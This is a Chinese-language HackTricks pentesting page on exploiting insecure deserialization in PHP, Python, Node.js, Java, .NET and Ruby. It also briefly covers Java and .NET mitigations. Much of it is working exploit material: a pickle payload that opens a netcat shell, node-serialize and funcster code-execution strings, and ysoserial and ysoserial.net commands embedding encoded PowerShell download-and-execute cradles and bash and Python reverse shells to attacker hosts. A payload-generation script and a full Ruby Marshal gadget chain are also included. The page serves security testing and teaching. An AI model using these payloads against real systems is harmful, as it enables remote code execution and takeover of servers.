从零开始学习AWS黑客技术,成为专家 ! 支持HackTricks的其他方式:
如果您想看到您的公司在HackTricks中做广告 或下载PDF格式的HackTricks ,请查看
加入 💬 关注 我们的Twitter 🐦 。
通过向
基本信息
序列化 是将对象转换为可保存的格式的方法,目的是将对象存储或作为通信过程的一部分传输。这种技术通常用于确保对象可以在以后的某个时间重新创建,保持其结构和状态。
反序列化 相反,是对抗序列化的过程。它涉及将以特定格式结构化的数据重新构建为对象。
反序列化可能很危险,因为它潜在地允许攻击者操纵序列化数据以执行有害代码 或在对象重建过程中导致应用程序出现意外行为。
PHP
在PHP中,在序列化和反序列化过程中使用了特定的魔术方法:
__sleep:在对象被序列化时调用。此方法应返回一个包含应该被序列化的对象所有属性名称的数组。通常用于提交挂起数据或执行类似的清理任务。
__wakeup:在对象被反序列化时调用。用于重新建立在序列化过程中可能丢失的任何数据库连接并执行其他重新初始化任务。
__unserialize:当对象被反序列化时,如果存在此方法,则调用它而不是__wakeup。与__wakeup相比,它对反序列化过程提供了更多控制。
__destruct:当对象即将被销毁或脚本结束时调用此方法。通常用于清理任务,如关闭文件句柄或数据库连接。
__toString:此方法允许将对象视为字符串。它可用于根据其中的函数调用读取文件或执行其他任务,有效地提供对象的文本表示。
复制 <?php
class test {
public $s = "This is a test";
public function displaystring(){
echo $this->s.'<br />';
}
public function __toString()
{
echo '__toString method called';
}
public function __construct(){
echo "__construct method called";
}
public function __destruct(){
echo "__destruct method called";
}
public function __wakeup(){
echo "__wakeup method called";
}
public function __sleep(){
echo "__sleep method called";
return array("s"); #The "s" makes references to the public attribute
}
}
$o = new test();
$o->displaystring();
$ser=serialize($o);
echo $ser;
$unser=unserialize($ser);
$unser->displaystring();
/*
php > $o = new test();
__construct method called
__destruct method called
php > $o->displaystring();
This is a test<br />
php > $ser=serialize($o);
__sleep method called
php > echo $ser;
O:4:"test":1:{s:1:"s";s:14:"This is a test";}
php > $unser=unserialize($ser);
__wakeup method called
__destruct method called
php > $unser->displaystring();
This is a test<br />
*/
?> 如果您查看结果,您会发现在对象被反序列化时会调用函数**__wakeup和 __destruct。请注意,在一些教程中,您会发现在尝试打印某个属性时会调用 __toString函数,但显然 不再发生**这种情况。
如果在类中实现了方法**__unserialize(array $data),则会调用该方法 而不是__wakeup()**。它允许您通过提供序列化数据作为数组来反序列化对象。您可以使用此方法来反序列化属性并在反序列化时执行任何必要的任务。
复制 class MyClass {
private $property;
public function __unserialize(array $data): void {
$this->property = $data['property'];
// Perform any necessary tasks upon deserialization.
}
} PHP反序列化 + 自动加载类
您可以滥用PHP的自动加载功能来加载任意的php文件和更多内容:
序列化引用值
如果出于某种原因,您想将一个值序列化为对另一个值序列化的引用 ,您可以:
复制 <?php
class AClass {
public $param1;
public $param2;
}
$o = new WeirdGreeting;
$o->param1 =& $o->param22;
$o->param = "PARAM";
$ser=serialize($o); PHPGGC (ysoserial for PHP)
phar:// 元数据反序列化
如果您发现了一个仅仅读取文件而不执行其中的php代码的LFI,例如使用函数如 file_get_contents(), fopen(), file() or file_exists(), md5_file(), filemtime() or filesize() 。 您可以尝试滥用使用 phar协议读取文件时发生的 反序列化**。
有关更多信息,请阅读以下文章:
Python
Pickle
当对象被反序列化时,将执行函数 __reduce__ 。
当被利用时,服务器可能会返回错误。
复制 import pickle, os, base64
class P(object):
def __reduce__(self):
return (os.system,("netcat -c '/bin/bash -i' -l -p 1234 ",))
print(base64.b64encode(pickle.dumps(P()))) 要了解有关逃离pickle jails 的更多信息,请查看:
Yaml & jsonpickle
以下页面介绍了在yaml python库中滥用不安全的反序列化 的技术,并最后提供了一个工具,可用于生成Pickle、PyYAML、jsonpickle和ruamel.yaml 的RCE反序列化有效负载:
类污染(Python原型污染)
NodeJS
JS魔术函数
JS 没有像PHP或Python那样会在创建对象时执行的"魔术"函数 。但它有一些经常被使用,即使没有直接调用 的函数 ,比如**toString、 valueOf、 toJSON。
如果滥用反序列化,您可以 破坏这些函数以执行其他代码**(潜在地滥用原型污染),从而在调用它们时执行任意代码。
复制 // If you can compromise p (returned object) to be a promise
// it will be executed just because it's the return object of an async function:
async function test_resolve() {
const p = new Promise(resolve => {
console.log('hello')
resolve()
})
return p
}
async function test_then() {
const p = new Promise(then => {
console.log('hello')
return 1
})
return p
}
test_ressolve()
test_then()
//For more info: https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/ __proto__ 和 prototype 污染
如果您想了解这个技术,请查看以下教程:
该库允许对函数进行序列化。示例:
复制 var y = {
"rce": function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })},
}
var serialize = require('node-serialize');
var payload_serialized = serialize.serialize(y);
console.log("Serialized: \n" + payload_serialized); 序列化对象 将如下所示:
复制 {"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"} 在示例中,当函数被序列化时,会在序列化对象后附加 _$$ND_FUNC$$_ 标志。
在文件 node-serialize/lib/serialize.js 中,您可以找到相同的标志以及代码如何使用它。
正如您在最后一段代码中所看到的,如果找到标志 ,则会使用 eval 来反序列化函数,因此基本上用户输入被用在 eval 函数内 。
然而,仅仅序列化 一个函数不会执行它 ,因为需要代码的某部分调用 y.rce 不可能 的。
无论如何,您可以修改序列化对象 ,添加一些括号 ,以便在反序列化对象时自动执行序列化函数。
在下一段代码中,请注意最后的括号 以及 unserialize 函数将如何自动执行代码:
复制 var serialize = require('node-serialize');
var test = {"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()"};
serialize.unserialize(test); 如先前所述,此库将在_$$ND_FUNC$$_后获取代码,并使用eval来执行 它。因此,为了自动执行代码 ,您可以删除函数创建 部分和最后的括号,只需执行类似以下示例中的JS oneliner:
复制 var serialize = require('node-serialize');
var test = '{"rce":"_$$ND_FUNC$$_require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) })"}';
serialize.unserialize(test); funcster 的一个值得注意的方面是标准内置对象 的不可访问性;它们超出了可访问范围。这种限制阻止了试图调用内置对象方法的代码执行,导致诸如"ReferenceError: console is not defined"的异常,当使用console.log()或require(something)等命令时。
尽管存在这种限制,通过特定方法可以恢复对全局上下文的完全访问权限,包括所有标准内置对象。通过直接利用全局上下文,可以绕过此限制。例如,可以使用以下代码片段重新建立访问权限:
复制 funcster = require("funcster");
//Serialization
var test = funcster.serialize(function() { return "Hello world!" })
console.log(test) // { __js_function: 'function(){return"Hello world!"}' }
//Deserialization with auto-execution
var desertest1 = { __js_function: 'function(){return "Hello world!"}()' }
funcster.deepDeserialize(desertest1)
var desertest2 = { __js_function: 'this.constructor.constructor("console.log(1111)")()' }
funcster.deepDeserialize(desertest2)
var desertest3 = { __js_function: 'this.constructor.constructor("require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });")()' }
funcster.deepDeserialize(desertest3) 更多信息请阅读此来源 ](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)。
serialize-javascript 软件包专门设计用于序列化目的,缺乏任何内置的反序列化功能。用户需要自行实现反序列化的方法。官方示例建议直接使用eval来反序列化序列化的数据:
复制 function deserialize(serializedJavascript){
return eval('(' + serializedJavascript + ')');
} 如果此函数用于反序列化对象,则您可以轻松利用 它:
复制 var serialize = require('serialize-javascript');
//Serialization
var test = serialize(function() { return "Hello world!" });
console.log(test) //function() { return "Hello world!" }
//Deserialization
var test = "function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()"
deserialize(test) 更多信息请阅读此来源 。
Cryo库
在以下页面中,您可以找到有关如何滥用此库以执行任意命令的信息:
Java - HTTP
在Java中,反序列化回调在反序列化过程中执行 。攻击者可以利用这种执行方式来构造恶意有效负载,触发这些回调,从而导致潜在的有害操作执行。
指纹
白盒测试
要识别代码库中潜在的序列化漏洞,请搜索以下内容:
使用java.io.ObjectInputStream,readObject,readUnshare函数。
特别注意:
XMLDecoder与外部用户定义的参数一起使用。
XStream的fromXML方法,特别是如果XStream版本小于或等于1.46,则容易受到序列化问题的影响。
ObjectInputStream与readObject方法结合使用。
实现readObject,readObjectNodData,readResolve或readExternal等方法。
ObjectInputStream.readUnshared。
黑盒测试
对于黑盒测试,请查找指示Java序列化对象(源自ObjectInputStream)的特定签名或“魔法字节” :
HTTP响应头中Content-type设置为application/x-java-serialized-object。
指示先前压缩的十六进制模式:1F 8B 08 00。
复制 javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwdAAML2xvZ2luLnhodG1s 检查是否存在漏洞
白盒测试
你可以检查是否安装了任何已知漏洞的应用程序。
复制 find . -iname "*commons*collection*"
grep -R InvokeTransformer . 黑盒测试
序列化测试
利用
ysoserial
复制 # PoC to make the application perform a DNS req
java -jar ysoserial-master-SNAPSHOT.jar URLDNS http://b7j40108s43ysmdpplgd3b7rdij87x.burpcollaborator.net > payload
# PoC RCE in Windows
# Ping
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cmd /c ping -n 5 127.0.0.1' > payload
# Time, I noticed the response too longer when this was used
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c timeout 5" > payload
# Create File
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c echo pwned> C:\\\\Users\\\\username\\\\pwn" > payload
# DNS request
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c nslookup jvikwa34jwgftvoxdz16jhpufllb90.burpcollaborator.net"
# HTTP request (+DNS)
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c certutil -urlcache -split -f http://j4ops7g6mi9w30verckjrk26txzqnf.burpcollaborator.net/a a"
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAYwBlADcAMABwAG8AbwB1ADAAaABlAGIAaQAzAHcAegB1AHMAMQB6ADIAYQBvADEAZgA3ADkAdgB5AC4AYgB1AHIAcABjAG8AbABsAGEAYgBvAHIAYQB0AG8AcgAuAG4AZQB0AC8AYQAnACkA"
## In the ast http request was encoded: IEX(New-Object Net.WebClient).downloadString('http://1ce70poou0hebi3wzus1z2ao1f79vy.burpcollaborator.net/a')
## To encode something in Base64 for Windows PS from linux you can use: echo -n "<PAYLOAD>" | iconv --to-code UTF-16LE | base64 -w0
# Reverse Shell
## Encoded: IEX(New-Object Net.WebClient).downloadString('http://192.168.1.4:8989/powercat.ps1')
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4ANAA6ADgAOQA4ADkALwBwAG8AdwBlAHIAYwBhAHQALgBwAHMAMQAnACkA"
#PoC RCE in Linux
# Ping
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "ping -c 5 192.168.1.4" > payload
# Time
## Using time in bash I didn't notice any difference in the timing of the response
# Create file
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "touch /tmp/pwn" > payload
# DNS request
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "dig ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "nslookup ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"
# HTTP request (+DNS)
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "curl ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net" > payload
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "wget ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"
# Reverse shell
## Encoded: bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" | base64 -w0
## Encoded: export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,ZXhwb3J0IFJIT1NUPSIxMjcuMC4wLjEiO2V4cG9ydCBSUE9SVD0xMjM0NTtweXRob24gLWMgJ2ltcG9ydCBzeXMsc29ja2V0LG9zLHB0eTtzPXNvY2tldC5zb2NrZXQoKTtzLmNvbm5lY3QoKG9zLmdldGVudigiUkhPU1QiKSxpbnQob3MuZ2V0ZW52KCJSUE9SVCIpKSkpO1tvcy5kdXAyKHMuZmlsZW5vKCksZmQpIGZvciBmZCBpbiAoMCwxLDIpXTtwdHkuc3Bhd24oIi9iaW4vc2giKSc=}|{base64,-d}|{bash,-i}"
# Base64 encode payload in base64
base64 -w0 payload 请随意使用下面的脚本为 Windows 和 Linux 创建所有可能的代码执行 有效载荷,然后在易受攻击的网页上测试它们:
复制 import os
import base64
# You may need to update the payloads
payloads = ['BeanShell1', 'Clojure', 'CommonsBeanutils1', 'CommonsCollections1', 'CommonsCollections2', 'CommonsCollections3', 'CommonsCollections4', 'CommonsCollections5', 'CommonsCollections6', 'CommonsCollections7', 'Groovy1', 'Hibernate1', 'Hibernate2', 'JBossInterceptors1', 'JRMPClient', 'JSON1', 'JavassistWeld1', 'Jdk7u21', 'MozillaRhino1', 'MozillaRhino2', 'Myfaces1', 'Myfaces2', 'ROME', 'Spring1', 'Spring2', 'Vaadin1', 'Wicket1']
def generate(name, cmd):
for payload in payloads:
final = cmd.replace('REPLACE', payload)
print 'Generating ' + payload + ' for ' + name + '...'
command = os.popen('java -jar ysoserial.jar ' + payload + ' "' + final + '"')
result = command.read()
command.close()
encoded = base64.b64encode(result)
if encoded != "":
open(name + '_intruder.txt', 'a').write(encoded + '\n')
generate('Windows', 'ping -n 1 win.REPLACE.server.local')
generate('Linux', 'ping -c 1 nix.REPLACE.server.local') serialkillerbypassgadgets
marshalsec
复制 <dependency>
<groupId>javax.activation</groupId>
<artifactId>activation</artifactId>
<version>1.1.1</version>
</dependency>
<dependency>
<groupId>com.sun.jndi</groupId>
<artifactId>rmiregistry</artifactId>
<version>1.2.1</version>
<type>pom</type>
</dependency> 安装 Maven ,然后编译 项目:
复制 sudo apt-get install maven
mvn clean package -DskipTests FastJSON
实验室
为什么
Java 在各种情况下广泛使用序列化,比如:
HTTP 请求 :序列化在参数管理、ViewState、cookies 等方面被广泛应用。
RMI(远程方法调用) :Java RMI 协议完全依赖序列化,在 Java 应用程序中的远程通信中起着关键作用。
RMI over HTTP :这种方法通常被基于 Java 的厚客户端 Web 应用程序使用,利用序列化进行所有对象通信。
JMX(Java 管理扩展) :JMX 利用序列化在网络上传输对象。
自定义协议 :在 Java 中,标准做法涉及传输原始 Java 对象,这将在即将展示的漏洞利用示例中进行演示。
预防措施
瞬态对象
实现 Serializable 接口的类可以将类内部不应序列化的任何对象标记为 transient。例如:
复制 public class myAccount implements Serializable
{
private transient double profit; // declared transient
private transient double margin; // declared transient 避免对需要实现Serializable接口的类进行序列化
在某些情况下,由于类层次结构的原因,**某些对象必须实现Serializable**接口,存在意外反序列化的风险。为了防止这种情况发生,确保这些对象是不可序列化的,方法是定义一个final的readObject()方法,始终抛出异常,如下所示:
复制 private final void readObject(ObjectInputStream in) throws java.io.IOException {
throw new java.io.IOException("Cannot be deserialized");
} 增强Java中的反序列化安全性
自定义 java.io.ObjectInputStream
覆盖 resolveClass() Bicycle类:
复制 // Code from https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
public class LookAheadObjectInputStream extends ObjectInputStream {
public LookAheadObjectInputStream(InputStream inputStream) throws IOException {
super(inputStream);
}
/**
* Only deserialize instances of our expected Bicycle class
*/
@Override
protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
if (!desc.getName().equals(Bicycle.class.getName())) {
throw new InvalidClassException("Unauthorized deserialization attempt", desc.getName());
}
return super.resolveClass(desc);
}
} 使用Java代理进行安全增强 提供了一种备用解决方案,当无法修改代码时。这种方法主要用于对有害类进行黑名单处理 ,使用JVM参数:
复制 -javaagent:name-of-agent.jar 它提供了一种动态保护反序列化的方式,非常适合在需要立即更改代码不切实际的环境中使用。
实现序列化过滤器 :Java 9通过**ObjectInputFilter**接口引入了序列化过滤器,提供了一个强大的机制,用于指定在反序列化之前序列化对象必须满足的条件。这些过滤器可以全局应用或针对每个流进行应用,为反序列化过程提供了细粒度的控制。
要使用序列化过滤器,您可以设置一个适用于所有反序列化操作的全局过滤器,或者为特定流动态配置它。例如:
复制 ObjectInputFilter filter = info -> {
if (info.depth() > MAX_DEPTH) return Status.REJECTED; // Limit object graph depth
if (info.references() > MAX_REFERENCES) return Status.REJECTED; // Limit references
if (info.serialClass() != null && !allowedClasses.contains(info.serialClass().getName())) {
return Status.REJECTED; // Restrict to allowed classes
}
return Status.ALLOWED;
};
ObjectInputFilter.Config.setSerialFilter(filter); 利用外部库增强安全性 :诸如NotSoSerial 、jdeserialize 和Kryo 等库提供了高级功能,用于控制和监控Java反序列化。这些库可以提供额外的安全层,如白名单或黑名单类、在反序列化之前分析序列化对象以及实施自定义序列化策略。
NotSoSerial 拦截反序列化过程,以防止执行不受信任的代码。
jdeserialize 允许分析序列化的Java对象而无需对其进行反序列化,有助于识别潜在的恶意内容。
Kryo 是一种注重速度和效率的替代序列化框架,提供可配置的序列化策略,可增强安全性。
参考资料
JNDI 注入 & log4Shell
在以下页面中查找JNDI 注入是什么,如何通过 RMI、CORBA 和 LDAP 滥用它以及如何利用 log4shell (以及此漏洞的示例):
JMS - Java 消息服务
产品
有几种产品使用此中间件发送消息:
利用
因此,基本上有一堆服务以危险的方式使用 JMS 。因此,如果您有足够的权限 向这些服务发送消息(通常需要有效凭据),您可能能够发送序列化的恶意对象,将由消费者/订阅者进行反序列化 。
这意味着在此利用中,所有将使用该消息的客户端都将受到感染 。
请记住,即使服务存在漏洞(因为它不安全地反序列化用户输入),您仍然需要找到有效的工具来利用漏洞。
参考资料
.Net
在 .Net 的背景下,反序列化利用的操作方式类似于 Java 中发现的方式,其中利用工具运行特定代码以在对象的反序列化期间执行。
指纹
白盒
应检查源代码中是否存在以下内容:
重点应放在允许类型由用户控制的变量确定的序列化程序上。
黑盒
搜索应针对 Base64 编码的字符串 AAEAAAD///// 或可能在服务器端进行反序列化的任何类似模式,从而授予对要反序列化的类型的控制权。这可能包括但不限于包含 TypeObject 或 $type 的 JSON 或 XML 结构。
ysoserial.net
ysoserial.net 的主要选项包括:--gadget --formatter --output --plugin
--gadget
--formatter
--output 原始 或 Base64 编码形式获得利用。_请注意,ysoserial.net 将使用 UTF-16LE (Windows 默认使用的编码)对有效负载进行编码 ,因此如果获取原始有效负载并仅从 Linux 控制台对其进行编码,可能会出现一些编码兼容性问题 ,这将阻止利用正常工作(在 HTB JSON 盒中,有效负载在 UTF-16LE 和 ASCII 中都有效,但这并不意味着它总是有效)。
--plugin 创建利用 ,如 ViewState
更多 ysoserial.net 参数
--minify 将提供一个更小的有效负载 (如果可能)
--raf -f Json.Net -c "anything" 这将指示可以与提供的格式化程序(在本例中为 Json.Net)一起使用的所有工具
--sf xml 您可以指示一个 gadget (-g)并且 ysoserial.net 将搜索包含 "xml" 的格式化程序(不区分大小写)
ysoserial 示例 以创建利用:
复制 #Send ping
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping -n 5 10.10.14.44" -o base64
#Timing
#I tried using ping and timeout but there wasn't any difference in the response timing from the web server
#DNS/HTTP request
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "nslookup sb7jkgm6onw1ymw0867mzm2r0i68ux.burpcollaborator.net" -o base64
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "certutil -urlcache -split -f http://rfaqfsze4tl7hhkt5jtp53a1fsli97.burpcollaborator.net/a a" -o base64
#Reverse shell
#Create shell command in linux
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.44/shell.ps1')" | iconv -t UTF-16LE | base64 -w0
#Create exploit using the created B64 shellcode
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADQANAAvAHMAaABlAGwAbAAuAHAAcwAxACcAKQA=" -o base64
复制 if (inputArgs.Test)
{
try
{
SerializersHelper.JsonNet_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
复制 public static object JsonNet_deserialize(string str)
{
Object obj = JsonConvert.DeserializeObject<Object>(str, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
return obj;
} 在先前的代码中存在漏洞 。因此,如果在一个 .Net 应用程序中发现类似的情况,那么该应用程序很可能也存在漏洞。
因此,--test 哪些代码块容易受到 ysoserial.net 创建的反序列化漏洞 的影响。
ViewState
预防措施
为了减轻 .Net 中反序列化带来的风险:
避免允许数据流定义其对象类型 。尽可能使用 DataContractSerializer 或 XmlSerializer。
对于 JSON.Net ,将 TypeNameHandling 设置为 None : %%%TypeNameHandling = TypeNameHandling.None%%%
避免使用带有 JavaScriptTypeResolver 的 JavaScriptSerializer 。
限制可以反序列化的类型 ,了解 .Net 类型的固有风险,例如 System.IO.FileInfo 可以修改服务器文件的属性,可能导致拒绝服务攻击。
谨慎处理具有风险属性的类型 ,例如 System.ComponentModel.DataAnnotations.ValidationException 的 Value 属性可能会被利用。
安全地控制类型实例化 ,以防止攻击者影响反序列化过程,即使是 DataContractSerializer 或 XmlSerializer 也会有漏洞。
使用自定义 SerializationBinder 为 BinaryFormatter 和 JSON.Net 实现白名单控制 。
了解 .Net 中已知的不安全反序列化小工具 ,确保反序列化器不会实例化此类类型。
将潜在风险代码与具有互联网访问权限的代码隔离 ,以避免将已知小工具(例如 WPF 应用程序中的 System.Windows.Data.ObjectDataProvider)暴露给不受信任的数据源。
参考资料
Ruby
在 Ruby 中,序列化由 marshal 库中的两种方法实现。第一种方法称为 dump ,用于将对象转换为字节流。这个过程称为序列化。相反,第二种方法 load 用于将字节流恢复为对象,这个过程称为反序列化。
为了保护序列化对象,Ruby 使用 HMAC(基于哈希的消息认证码) ,确保数据的完整性和真实性。用于此目的的密钥存储在以下几个可能的位置之一:
config/initializers/secret_token.rb
复制 #!/usr/bin/env ruby
# Code from https://www.elttam.com/blog/ruby-deserialization/
class Gem::StubSpecification
def initialize; end
end
stub_specification = Gem::StubSpecification.new
stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")#RCE cmd must start with "|" and end with "1>&2"
puts "STEP n"
stub_specification.name rescue nil
puts
class Gem::Source::SpecificFile
def initialize; end
end
specific_file = Gem::Source::SpecificFile.new
specific_file.instance_variable_set(:@spec, stub_specification)
other_specific_file = Gem::Source::SpecificFile.new
puts "STEP n-1"
specific_file <=> other_specific_file rescue nil
puts
$dependency_list= Gem::DependencyList.new
$dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])
puts "STEP n-2"
$dependency_list.each{} rescue nil
puts
class Gem::Requirement
def marshal_dump
[$dependency_list]
end
end
payload = Marshal.dump(Gem::Requirement.new)
puts "STEP n-3"
Marshal.load(payload) rescue nil
puts
puts "VALIDATION (in fresh ruby process):"
IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
pipe.print payload
pipe.close_write
puts pipe.gets
puts
end
puts "Payload (hex):"
puts payload.unpack('H*')[0]
puts
require "base64"
puts "Payload (Base64 encoded):"
puts Base64.encode64(payload) 
